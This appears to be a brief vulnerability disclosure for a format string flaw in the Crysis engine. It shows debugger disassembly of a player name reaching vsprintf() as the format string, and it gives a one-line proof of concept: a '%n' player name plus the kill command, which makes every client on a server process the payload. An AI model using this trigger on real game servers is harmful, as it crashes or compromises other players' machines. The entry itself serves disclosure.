No description provided by source.
The Crysis engine passes along internal debug strings through the game. One of them is passed to vsprintf() in the crt lib: 30503263 8D8C24 10100000 LEA ECX,DWORD PTR SS:[ESP+1010] 3050326A 51 PUSH ECX 3050326B 50 PUSH EAX 3050326C 8D5424 08 LEA EDX,DWORD PTR SS:[ESP+8] 30503270 52 PUSH EDX 30503271 FF15 F8A17530 CALL DWORD PTR DS:[<&MSVCR80.vsprintf>] ; MSVCR80.vsprintf 0032CAD8 30503277 w2P0 /CALL to vsprintf from cryactio.30503271 0032CADC 0032CAE8 è&Ecirc;2. |buffer = 0032CAE8 0032CAE0 0032DAF8 &oslash;&Uacute;2. |format = "Pathfinding in animation graph failed (LONGPOKE%SAAAAAAAA) - no path from 'Parachute_Float_NW' to 'X_Combat_IdleAimingNull_NW'" ; Your name is passed in as part of the format. This is a nono... 0032CAE4 0032DAF8 &oslash;&Uacute;2. \arglist = 0032DAF8 POC: Type name %n\x00\x00\x00\x00 in the console. Type kill. Upon your death, everyone in the server will instantly execute the format string vulnerability. If you are in third person in a vehicle, it will be exploited on your game as well. -LONGPOKE<ATOM>